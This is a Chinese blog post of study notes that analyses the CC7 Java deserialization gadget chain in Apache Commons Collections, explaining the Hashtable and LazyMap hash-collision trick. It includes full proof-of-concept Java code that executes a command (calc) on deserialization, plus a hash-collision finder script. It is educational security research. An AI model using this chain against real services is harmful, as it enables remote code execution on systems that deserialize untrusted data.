Java安全--CC7

最新推荐文章于 2024-07-09 14:45:00 发布
最新推荐文章于 2024-07-09 14:45:00 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: Java安全 文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_64201116/article/details/128401981
版权

在学CC7的时候我有这么几个疑问

1.为什么要两个LazyMap

2.hashCode那一步怎么计算的

3.为什么要remove yy

4.为什么put两个

我们可以先看一下CC7的链子是怎么走的:

其实分析链子还是从命令执行走到readObject比较好理解,虽然比较麻烦,比较繁琐,但还是这样子分析提升比较大,主要是知道自己在写啥,知道某个地方我们需要传入什么,不用抄一份payload去调试。

我们从LazyMap这个点开始,因为LazyMap前面我们都很熟悉了,现在我们的目的是找何处调用了get,右键get,查找方法,有一千多个,最后定位在了AbstractMap这里,AbstractMap.equals调用了get,所以只要何处调用了equals,就可以继续下一步

这里有个很关键的点,就是AbstractMap是被HashMap继承的

而且equals这个方法AbstractMap有并且调用了get,但是HashMap没有equals这个方法。即只要调用了HashMap.equals就会调用AbstractMap.equals,然后会调用LazyMap.get,一切就大功告成了

继续往上,在HashTable中的reconstitutionPut方法调用了key.equals,所以只要控制key的类型为HashMap就可以了

而reconstitutionPut也在HashTable的readObject中调用了

到此我们就可以开始编写EXP了,因为如果不从Hashtable这个类来写的话利用AbstractMap这个抽象类不put东西的时候是进不到LazyMap.get的,但是如果put东西了就会过不了LazyMap.get里面判断键存不存在。然后自相矛盾,所以只能从Hashtable开始编写了:

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.AbstractMapDecorator;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.AbstractMap;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

public class CC7 {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map lazymap1 = LazyMap.decorate(hashMap, new ConstantTransformer(1));
        lazymap1.put("Aa", "value");

        HashMap<Object, Object> hashMap1 = new HashMap<>();
        Map lazymap2 = LazyMap.decorate(hashMap1, chainedTransformer);
        lazymap2.put("BB", "value");

        Hashtable<Object, Object> objectObjectHashtable = new Hashtable<>();
        objectObjectHashtable.put(lazymap1, 1);
        objectObjectHashtable.put(lazymap2, 2);

        serialize(objectObjectHashtable);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
        return objectInputStream.readObject();
    }
}

解疑一:为什么remove(Aa)

我们用这个代码的时候发现序列化的时候可以弹计算器,但是反序列化却不行。其实还是老毛病,就是在执行objectObjectHashtable.put(lazymap2, 2);的时候会put进去一个元素:

(下图是序列化的时候put进去一个键)

所以反序列的时候进不了那个判断键是否存在的判断:

(下图是反序列化的时候过不了的那个判断)

因此要remove(Aa)这样子才能过那个判断。

解疑二:Hashtable为什么要put两个

我们需要执行Hashtable的e.key.equals,而要执行这个语句需要有两个Entry才能进行遍历,并且会执行第二个Entry的e.key.equals,所以我们需要在第二个Entry中传入恶意链(当然方便起见也可以两个都传)。因此需要两个LazyMap,从而put两个。

(下图是反序列化的时候需要进入并执行的for循环)

解疑三:对于LazyMap.put里面的字母有要求吗?

答案是有,还是上面那张图,就是进入了for循环,还得过前半个判断。因为 0&&xxx,xxx是不会被执行的,所以我们要确保e.hash==hash,即我们第一个传入的LazyMap的ke的.hash值和第二个传入LazyMapkey的的hash值要相等。

怎么确保他们相等呢?可以先调试进去看一下:

可以看到他的计算规律就是

第一次计算val[i]是A,A的ascii码值为65,h值就是65。

第二次计算var[i]是a, a的ascii码是97,所以第二次计算就是31*65 + 97 = 2112

从此我们可以写一个脚本:

import string

code = string.ascii_uppercase + string.ascii_lowercase


def hashCode(hashString):
    return 31 * ord(hashString[0]) + ord(hashString[1])


for i in code:
    for j in code:
        for m in code:
            for n in code:
                str1 = i + j
                str2 = m + n
                if str1 != str2 and hashCode(str1) == hashCode(str2):
                    print("值为:" + str(hashCode(str1)) + " " + "code1:" + str(str1) + " " + "code2:" + str(str2))

只要是跑出来的组合都可以使用。

由于上面那个代码序列化的时候也会弹计算器,这是我们不希望的,因此我们利用反射改进一下代码:

package org.example;

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.AbstractMapDecorator;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.util.AbstractMap;
import java.util.HashMap;
import java.util.Hashtable;
import java.util.Map;

public class CC7 {
    public static void main(String[] args) throws Exception{
        Transformer[] transformers = {
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(new Transformer[0]);

        HashMap<Object, Object> hashMap = new HashMap<>();
        Map<Object, Object> lazymap1 = LazyMap.decorate(hashMap, new ConstantTransformer(1));
        lazymap1.put("Aa", "value");

        HashMap<Object, Object> hashMap1 = new HashMap<>();
        Map lazymap2 = LazyMap.decorate(hashMap1, chainedTransformer);
        lazymap2.put("BB", "value");

        Hashtable<Object, Object> objectObjectHashtable = new Hashtable<>();
        objectObjectHashtable.put(lazymap1, 1);
        objectObjectHashtable.put(lazymap2, 2);

        lazymap2.remove("Aa");

        Class<ChainedTransformer> chainedTransformerClass = ChainedTransformer.class;
        Field iTransformers = chainedTransformerClass.getDeclaredField("iTransformers");
        iTransformers.setAccessible(true);
        iTransformers.set(chainedTransformer, transformers);

//        serialize(objectObjectHashtable);
        unserialize("ser.bin");

    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(obj);
    }
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(Filename));
        return objectInputStream.readObject();
    }
}

Java安全学习笔记--反序列化利用链CC7
m0_64685672的博客
01-27 1536
测试环境: jdk1.8(jdk8u71) Commons Collections4.0 Hashtable 和HashMap很相似,使用链地址法解决哈希冲突,线程安全 Cc7cc6差不多,cc7使用Hashtable来触发LazyMap的get方法,比cc6的稍微复杂一些。 利用链核心 final Transformer chainedTransformer= new ChainedTransformer(new Transformer[0]); Transfo
Java安全-CC链全分析
最新发布
sagic的博客
11-19 2281
Java安全学习,JavaCC链1-7分析
java--CommonsCollections7 学习
zyer
05-31 279
根据之前的学习,发现看cc7应该很简单了。(环境:JDK8u311) cc6使用了HashMap和HashSet,cc7使用的是Hashtable Hashtable 与 HashMap 十分相似,是一种 key-value 形式的哈希表,但仍然存在一些区别: HashMap 继承 AbstractMap,而 Hashtable 继承 Dictionary ,可以说是一个过时的类。 两者内部基本都是使用“数组-链表”的结构,但是 HashMap 引入了红黑树的实现。 Hasht
Java反序列化 CC7利用链记录
LTianHang的博客
02-07 192
Java反序列化 CC7利用链记录
Java安全』反序列化-CC7反序列化漏洞POP链分析_ysoserial CommonsCollections7 PoC分析
Ho1aAs‘s Blog
03-13 3044
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. LazyMap.get()调用this.factory.transform()2. AbstractMap.equals()调用m.get()3. AbstractMapDecorator.equals()调用this.map.equals4. HashTable反序列化触发e.key.equals(key)为什么最后要lazyMap2.remove("yy")?为什么多了一个键yy?为什么yy和zZ的hash相同?POP链完 前言 CC7是另一种
12-java安全——java反序列化CC7链分析
网络安全
08-23 3123
在分析CC7链之前,需要对Hashtable集合的源码有一定的了解。 从思路上来说,我觉得CC7利用链更像是从CC6利用链改造而来,只不过是CC7链没有使用HashSet,而是使用了Hashtable来构造新的利用链。 经过测试,CC7利用链在jdk8u071和jdk7u81都可以利用成功,payload代码如下: package com.cc; import org.apache.commons.collections.Transformer; import org.apache.commo
greenplum-cc-web-6.8.0-gp6-rhel7-x86_64.zip
09-14
此压缩包"greenplum-cc-web-6.8.0-gp6-rhel7-x86_64.zip"包含的主要组件可能有以下几个部分: 1. **Greenplum数据库服务器**:这是Greenplum的核心部分,负责数据的存储、管理和查询处理。它包含了数据分布、查询...
初级java笔试题-coding-interview-university-zh-tw_CC1024:编码面试大学-zh-tw_CC1024
06-03
初级java笔试题编程面试大学 我最初创建它是为了成为一名软件工程师的学习主题的简短待办事项列表,但它增长到您今天看到的大列表。 完成这个学习计划后,! 你可能不需要像我一样学习。 总之,你需要的都在这里。 ...
greenplum-cc-web-6.2.0-gp6-rhel7-x86-64.7z
03-29
1. 解压文件:首先,你需要解压下载的greenplum-cc-web-6.2.0-gp6-rhel7-x86_64.7z压缩包,可以使用7-Zip或者在Linux下使用tar命令进行解压。 2. 安装依赖:确保系统已安装所有必要的依赖库,例如Java运行环境(JRE...
java代码-bbbbbbb
07-15
封装是面向对象的三大特性之一,Java通过访问修饰符(如public、private、protected)实现数据的隐藏,只允许特定部分的代码访问这些数据,提高了代码的安全性。 4. **继承**: 继承是另一个面向对象特性,一个类...
java.util.Hashtable
知行流浪
08-10 2385
定义            public class Hashtable            extends Dictionary            implements Map,Cloneable, Serializable          此类实现一个哈希表,该哈希表将键映射到相应的值。任何非null对象都可以用作键或值。为了成功地在哈希表中存储和获取对象,用作键的对象必须实现
Commons-Collections篇-CC7
鸣蜩十四的博客
07-09 1096
CC5反序列化链相似,CC7也是后半条LazyMap执行命令链不变,但是中间过程通过AbstractMap.equals()触发LazyMap.get()方法。
【Web】Java反序列化之CC7链——Hashtable
uuzeray的博客
03-04 1349
ok 进入for循环的事情我们已经解决了,但是想去e.key.equals(key)还得要满足e.hash == hash(&&短路机制你懂的),这里的e值为tab[index],也就是第一组传入的值,这里的hash是通过key.hashCode()获取的,也就是说要put两个hash值相等的元素进去才行,这个点我们下面单独来讲。调用了m.get(),而m是根据传入的对象获取的,也就是说如果key传入的也是LazyMap类对象,那么这里就是调用的LazyMap#get,从而为所欲为。如何解决这个问题呢?
【深入Java基础】Hashtable的用法:基本用法,排序及同步
哈哈哈哈哈哈哈
01-31 8116
Hashtable的用法:基本用法,排序及同步Hashtable是继承的Dictionary类,实现了Map Hashtable<Integer,String> hashtable = new Hashtable<>(); hashtable.put(1,"aa"); hashtable.put(4,"dd"); hashtable.put(2,"
java biconsumer 参数_Java Properties forEach(BiConsumer)用法及代码示例
weixin_42388680的博客
02-17 903
Properties类的forEach(BiConsumer)方法在哈希表的每个条目上执行BiConsumer操作,直到已处理完所有条目或该操作引发异常。 BiConsumer操作是按迭代顺序执行的哈希表键值对的函数操作。方法遍历Hashtable的每个元素,直到该方法处理完所有元素或发生异常为止。操作抛出的异常将传递给调用方。用法:public void forEach(BiConsumer a...
Java反序列化】CC1调用链poc
m0_61572518的博客
04-24 2141
package demo3.cc1; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.In.
JAVA反序列化之CommonCollections1利用链
javaYY_的博客
07-08 314
之前简单学习了JAVA反序列化和URLDNS这条利用链,讲过的基础就不再赘述了,今天来学习CommonCollections这条利用链。由于这条链相对于URLDNS比较复杂,为了更容易理解,所以首先采用P牛精简后的一段DEMO来理解这条利用链:DEMO1 1package Commoncollections1; 2import org.apache.commons.collections.Transformer; 3import org.apache.commons.collections.funct
Hashtable的用法(初学Java时的困扰,闲了就写出来了)
cwj的专栏
08-13 737
<br />Hashtable基本概述<br />Hashtable-哈希表类<br />以哈希表的形式存储数据,数据的形式是键值对。<br />特点:<br />查找速度快,遍历相对慢,键值不能有空指针和重复数据。<br />创建<br />Hashtable<Integer,String> ht = new Hashtable<Integer,String>();<br />添值<br />ht.put(1,"Andy");<br />ht.put(2,"Bill");<br />ht.put(3,"C
java提高篇(二五)-----HashTable
chenssy 的技术博客
04-03 947
原文出自:http://cmsblogs.com/?p=618。尊重作者的成果,转载请注明出处! 个人站点:http://cmsblogs.com --------------------------------------------------------------------------------------------------------------------------...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值